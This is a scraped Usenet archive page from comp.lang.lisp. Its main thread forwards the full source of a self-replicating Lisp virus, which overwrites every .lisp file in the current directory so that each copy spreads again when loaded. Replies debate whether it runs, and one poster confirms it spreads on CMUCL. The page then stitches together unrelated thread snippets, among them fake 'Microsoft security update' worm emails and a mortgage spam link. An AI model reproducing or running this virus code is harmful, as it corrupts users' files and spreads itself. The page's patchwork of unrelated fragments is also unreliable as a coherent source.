[Fwd] Just for fun

-------------------- Start of forwarded message --------------------
Newsgroups: fido7.xsu.hacker
From: "Ilya V. Vasilyev" (2:5020/287)
Date: Thu, 26 Jun 2003 10:27:28 +0600
Subject: Just for fun

* Forwarded by Ilya V. Vasilyev (2:5020/287)
* Area : su.cm (su.cm)
* From : andrew baranovich, 2:465/215 (Wednesday June 25 2003 15:21)
* To   : All
* Subj : Just for fun
* Originally in su.cm
Crossposted to pvt.virii
Crossposted to ru.virus

;; Virus LISP.Futhorc by herm1t(at)netlux.org / Jun'03
(setq virus '(defun infect (&optional (ls (directory "*.lisp")))
  (defun writel (l s) (when l (write-line (car l) s) (writel (cdr l) s)))
  (when (setq vic (car ls))
    (let ((p nil)) (with-open-file (i vic :direction :input)
      (unless (equal (second (read i)) 'VIRUS) (file-position i 0)
        (loop (unless (setq line (read-line i nil nil)) (return))
          (setq p (append p (list line))))))
      (when p (with-open-file (o vic :direction :output)
        (format o "(setq virus '~S~%)(eval virus)(infect)~%" virus)
 (writel p o))))
    (infect (cdr ls))))
)(eval virus)(infect)

--
herm1t http://vx.netlux.org/ HERM-RIPE UR6IUF 2:465/215

-+- golded 3.0.1
 + Origin: Feed my fear (2:465/215)

-------------------- End of forwarded message --------------------

--
Ivan Boldyrev

                                                        ���� ����� ����!
0
nospam5292 (249)
6/27/2003 6:32:13 AM
comp.lang.lisp 16307 articles. 0 followers. Post Follow

In article <u65mrus6p.fsf@dtpq.com>,
Christopher C. Stacy <cstacy@dtpq.com> wrote:
>This program is a lot of gibberish and does not do anything at all:
>most of it is never even executed.

Sure it is.

As written, it doesn't do anything other than append itself to all the
*.lisp files in the current directory; if any of them are later loaded (or
compiled and the resulting binary loaded) they'll do the same.  It's a
simple virus propagation wrapper; it's a simple matter to modify it to do
something (harmful or not) in addition to propagating itself.

--
Barry Margolin, barry.margolin@level3.com
Level(3), Woburn, MA
cstacy@dtpq.com (Christopher C. Stacy) writes:

> This program is a lot of gibberish and does not do anything at all:
> most of it is never even executed.

It spreads nicely on CMUCL, albeit with warnings about undefined
variables.  Didn't you notice the EVAL call near the end?

The (second (read i)) call can have consequences not expected by
the author.
0
kon (429)
6/27/2003 10:07:21 PM

 Barry> In article <u65mrus6p.fsf@dtpq.com>,
 Barry> Christopher C. Stacy <cstacy@dtpq.com> wrote:
 >> This program is a lot of gibberish and does not do anything at all:
 >> most of it is never even executed.

 Barry> Sure it is.

I think I made a typographical error when pasting it into an
editor buffer and reformatting it so that I could actually read it.
My version of it had it setting the variable VIRUS to the source code
of a function called INFECT that took one optional arg but had no body.

0
cstacy (118)
6/28/2003 3:15:21 AM
On 8423 day of my life Christopher C. Stacy wrote:

> I would be circumspect in writing programs called "Virus" and posting
> them on the net in so-called "hacker" newsgroups,

This is NG of "hackers" in sense of Eric Raymond.

> even if it is supposed to be (I assume) some kind of joke.  It looks
> like you are not the original author of the "virus" program, but can
> you understand what you have posted?

I am smart enough.  May be, I am even Turing-complete :)))

> It's as if someone has cut-and-pasted fragments of Lisp code from
> other programs, without understanding what they were copying.

I do understand code before copying.

> This program is a lot of gibberish and does not do anything at all:
> most of it is never even executed.

Be more attentive: the virus is in your brain now :)

--
Ivan Boldyrev

                                Onions has layers.  Unix has layers too.
0
nospam5292 (249)
6/28/2003 8:06:53 PM
On Sun, Jun 29, 2003 at 03:06:53AM +0700, Ivan Boldyrev wrote:
> Be more attentive: the virus is in your brain now :)

Actually, he's right even though he didn't mean it.  I'll give you a
hint: the program invokes undefined behavior.

--
; Matthew Danish <mdanish@andrew.cmu.edu>
; Signed or encrypted mail welcome.

ipfw fwd?
hello I want to forward everything coming from 192.168.9.2 to my freebsd box to 192.168.2.1, both subnets are on different NICs why does not this rule work: ipfw add fwd 192.168.2.1 tcp from 192.168.9.2 to any keep-state thanks�! "lycanthrope" <asdf@asdf.asdf> wrote in message news:cch5nc$1ja$1@ls219.htnet.hr... > hello > I want to forward everything coming from 192.168.9.2 to my freebsd box to > 192.168.2.1, both subnets are on different NICs > why does not this rule work: > ipfw add fwd 192.168.2.1 tcp from 192.168.9.2 to any keep-state I ...

[LogoForum] Re: (Fwd) MSWLogo crash (FMSLogo does too) #2 1988227
The message below is being cross-posted from LogoForum. --- In LogoForum@yahoogroups.com, Andreas Micheler wrote: > David, how can I download all of the new tests in CVS? > (I only a few times did use CVS before, but it seems better to use CVS > instead of downloading all the files individually) The instructions are at http://sourceforge.net/cvs/?group_id=149686. In brief, if you're on GNU/Linux, execute the following commands in a shell. When prompted for a password for anonymous, simply press the Enter key. cvs -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/fmslogo l...

[News] Linux Laptops: "Everything Just Works"

Can I *just* put OS X Panther on a tray-loader?
I picked up a friend's iMac 333MHz tray-loader yesterday. It has OS 8.6 on the original 6G hard drive. Since it was free, I figured I'd upgrade the firmware, get Panther (because I want it now and don't want to wait for Tiger), add another 256MB of Ram to bump it up to +300MBs and trim down Panther by getting rid of stuff I'll never use on the machine (languages, bluetooth, ipod, firewire stuff). I figure that that'll give me a lot of room for the moment (and I have a USB CD burner I can use when things get too big). I just want to know, if I get the retail version ...

Re: (fwd) Re: (fwd) Panther and Tk-TableMatrix-1.01?
On Jan 6, 2004, at 8:33 AM, Steve Lidie wrote: > -- forwarded message -- > Path: > Lehigh.EDU!newsread.com!newsstand.newsread.com!kibo.news.demon.net! > demon!newsfeed.mathworks.com!wn11feed!worldnet.att.net!4.24.21.153! > chcgil2-snh1.gtei.net!news.bbnplanet.com!crtntx1-snh1.gtei.net! > news.gtei.net!newsfeed2.dallas1.level3.net!news.level3.com! > postnews1.google.com!not-for-mail > From: jerry.levan@eku.edu (Jerry) > Newsgroups: comp.lang.perl.tk > Subject: Re: (fwd) Panther and Tk-TableMatrix-1.01? > Date: 5 Jan 2004 21:20:30 -0800 >...

Buying Advice Requested
My beautiful Cornerstone P1600 just kicked the bucket, which means that I am now on the market for a new display. I have been searching around and reading countless reviews. I spent an hour or so looking at LCD monitors, but I don't think they would suit me. On my Cornerstone I ran 1600x1200@85 and it was a sharp and clear picture. I don't think that LCD's are there yet. I also play the occasional game. I am probably going to have to go with another Cornerstone monitor, but I was wondering if there are any comparable 21'-22' monitors on the market. It is difficult to ...

[OT] Apparently the FBI and ATF Aren't Aware That Its Just A 1960's Stereotype
Steve Mackay needs to straighten them out! 8) http://www.sacbee.com/state_wire/story/7891625p-8830265c.html Cuss and discuss. -- I got a sweater for Christmas last year. I wanted a screamer or a moaner, but I got a sweater. -Steven Wright Mayor of R'lyeh wrote: > > Steve Mackay needs to straighten them out! 8) > http://www.sacbee.com/state_wire/story/7891625p-8830265c.html > > Cuss and discuss. Soooo, does he run a Mac while restoring his bikes, or is there some other connection here to advocating Macs not make obvious by your article reference? On Thu, 04 Dec ...

[Fwd: Re: Dynamic kerberos auth against 2 realms?]
This is a multi-part message in MIME format. --------------010507080007040106040708 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit ==== This message and any attachments are confidential. Unauthorized use or disclosure of this message is strictly prohibited, and this message must be destroyed immediately if received by an unauthorized recipient. ==== --------------010507080007040106040708 Content-Type: message/rfc822; name="Re: Dynamic kerberos auth against 2 realms?" Content-Transfer-Encoding: 7bit Content-Disposition: inline; file...

Just Venting and a Question
I'm curious as to why some questions posted here get results and solutions, while others are answered in a seemingly foreign language and I can't begin to comprehend or understand the answers that are given. Is there a place to learn this foreign language to be able to better communicate questions, as to derive the solution that the poster is attempting to receive? If so, where please? I have a program that I'm trying to track animal genetic upline, example: AnimalID is the Animal Name, there in the same table is Sire (father) and Dam (mother).My problem is I can get the Sire and...

Remote login fun & games
Hi all After a few months of pain-free ssh remote login and NFS access between Mac OS X desktop and a FreeBSD server (FreeBSD Athlon 5.4-RELEASE-p6), things got a bit fraught recently when I: (1) installed Tiger on the OS X machine (2) tried to make a backup mirror of the FreeBSD boot disk Somewhere along the way, ssh stopped letting 'mwh' in as a user even though 'root' was still accepted, I found a lot of my /etc/ files on the server had got set back to defaults and my automated backups had not been saving /etc/ <- one BIG lesson learned for the future...

[Fwd: Vhdl dynamic generation]
-------- Original Message -------- Subject: Vhdl dynamic generation Date: Wed, 25 Jun 2003 09:22:37 -0700 (PDT) From: silicia mando Hello, Besides "Generic" and "Global" variable concepts, do you think that VHDL is suitable for "dynamic" parametrization? Let's take the following examples: if implementing a conventional FIR filter with known input range, then we can optimally pre-calculate the minimum wordldength at each FIR node. These optimal values should be preferably used when implementing this filter. However, can we set (from the same synthesiser en...

FWD: Watch security update which came from Microsoft Corp.
--ggdrovmfunr Content-Type: multipart/related; boundary="drwohtvovbdngao"; type="multipart/alternative" --drwohtvovbdngao Content-Type: multipart/alternative; boundary="hhzkhchthbwiumxbc" --hhzkhchthbwiumxbc Content-Type: text/plain Content-Transfer-Encoding: quoted-printable MS Partner this is the latest version of security update, the "November 2003, Cumulative Patch" update which eliminates all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express. Install now to protect your computer f...

OT Re: Is it just me...
>It was a holiday on July 4 in the USA, something about independence >from Britain a few years back. If you're that independent, how come your president needs our prime minister as a suppository? sending to informix-list Maelwys Filidh wrote: >>It was a holiday on July 4 in the USA, something about independence > >>from Britain a few years back. > > If you're that independent, how come your president needs our prime minister > as a suppository? > :o) I'm not sure. Stay calm, we'll hopefully rectify that situati...

Just when you thought OTP was a thing of the past :
Just when you thought OTP was a thing of the past, someone shakes things up. http://www.eeproductcenter.com/micro/brief/showArticle.jhtml?articleID=197800244 http://www.silabs.com/public/documents/pr_doc/products/Microcontrollers/Small_Form_Factor/en/T600_FINAL.pdf Looks likely to shake up Microchip and Freescale ? Wonder how they test these ? -jg Jim Granville wrote: > > Just when you thought OTP was a thing of the past, someone shakes things > up. > > http://www.eeproductcenter.com/micro/brief/showArticle.jhtml?articleID=197800244 > > > http://www.silabs...

FWD: Apply the corrective patch
--liqhwafh Content-Type: multipart/related; boundary="mjjdcolcnly"; type="multipart/alternative" --mjjdcolcnly Content-Type: multipart/alternative; boundary="yqzdcwryhbmvcjxb" --yqzdcwryhbmvcjxb Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Microsoft User this is the latest version of security update, the "November 2003, Cumulative Patch" update which resolves all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three newly discovered vulnerabilities. Install now to ma...

fun iPhone WiFi trick -
:) So, let's say that I'm in a neighborhood that I'm not familiar with. I ask somebody nearby what the local zip code is (let's say, 92116), and then I go to the Maps widget on my iPhone. I type in wifi 92116 and then hit Search. Up will pop up a whole array of (usually) free wireless networks -- coffee shops, libraries, book stores. Alternatively, I can just search for a Starbucks in the area, and then walk across the street to the coffee shop that Starbucks is trying to drive out of business. The competitor will always have free wireless, while Starbucks never does. ...

Just a little tidbit to offer
Watch for line wraps /* popup.rex */ WS = .oleobject~new("Wscript.Shell") WS~Popup("This Popup Will Stay On The Screen 3 Seconds or Until OK Is Pressed", 3) WS~Popup("This Popup Will Stay On The Screen Until OK Is Pressed",-1) On Tue, 30 Nov 2004 20:18:50 GMT, Lee Peedin <lpeedinREMOVE@UPPERCASEnc.rr.com> wrote: >Watch for line wraps > >/* popup.rex */ > >WS = .oleobject~new("Wscript.Shell") >WS~Popup("This Popup Will Stay On The Screen 3 Seconds or Until OK Is >Pressed", 3) > >WS~Popup("This Popup ...

Fwd: (fwd) Derived and ConfigSpecs
Begin forwarded message: > > > Hi all, > > I was under the impression that if you did something like: > > package Tk::Foo; > use base qw/Tk::Derived Tk::Bar/; > > sub Populate { > my ($self, $args) = @_; > $self->ConfigSpecs(-blah => [qw/PASSIVE blah/]); > $self->SUPER::Populate($args); > } > > Then the new widget Foo would have all the configure options of > Tk::Bar, > plus the new -blah option for itself. > > Is this the case? Yes. > > I'm trying to subclass Tk::Menubutton (I ...

Micro-Palooza!!! (fwd)
With only 16 days left before the Micro-Palooza C= Party in Portland, Oregon, co-owner Anthony Ramos of Ground Kontrol provides the following update. ---- Date: Sun, 14 Dec 2003 21:24:29 -0800 From: Anthony Ramos Subject: Micropalooza!! Ok everybody, I've got some catching up to do on this event, to say the least. Here's a start: Planning the event itself: What: Commodore user group Super Summit featuring four live "chip music" performances. When: Tuesday, December 30th User group meet: 1pm - 10pm Performances: 6pm - 10pm == WHO == Commodore En...

some people just jump on and feed off shit
they don't play the game they just feed ...

Refactoring not just for Software Developers (maybe)
I recently did a small project using Macromedia Flash. The project was mostly crude hand-drawn graphics. It did not qualify as a programming assignment. My first attempts convinced me that I couldn't just draw the whole thing one frame at a time. Even a small change would require dozens of changes. Being a software developer and not an artist, I approached the problem as a programming exercise. I determined that it was essential to be able to make many small changes to the movie with absolute minimal cost. This required that every element had to be represented in one place---typically eit...

fwd: hey its me again
hey there, i thought you'd like to check this out I refinanced my mortgage and this site got me the best financer available I hope your ready for lower mortgage repayments! http://srd.yahoo.com/drst/157765/*http://cheapermortgage.cn/4/index.asp?RefID=198478 ...

something weird just happened
This happened to me last week and I have been wondering if I should mention it here, or how I could find the words. So I'm only going to tell you what I heard. ### We were asked to build an off-site DRP system to match our AlphaServer- DS20e based business system. Before we purchase any hardware outside of the company, we are required to check with our corporate reuse center. I did this last week and learned that I could have my pick of five AS-DS20e systems that just arrived. I asked the manager if he knew where these systems came from and he replied "the VAX modernization program&...

Fwd: Re: .TLD minimum number of nameservers rule
Thanks all. Chris, Anand that's very useful to know, sorry Jeff and Philippe, your interesting suggestions wont work in this case. If I attack the problem from the other way down instead, the fact my current registra doesn't allow me to add PTR or DNAME records to my top level domain limits what exactly ? For instance, would this be a problem when implementing a wide area bonjour subdomain using my own local dns server for clients that are mobile (internal/external) ? I'm only allowed to add A NS MX CNAME TXT and SRV records via the web interface of my registra and I i...

Fwd: [HP3000-L] OT: The Iraq Dilemma: Frying Pan or Fire?
Check the article "The Iraq Dilemma: Frying Pan or Fire?" in: www.stratfor.com/corporate/static_index.neo FW "Am I not destroying my enemies when I make friends of them?" - Abraham Lincoln * To join/leave the list, search archives, change list settings, * * etc., please visit http://raven.utc.edu/archives/hp3000-l.html * ...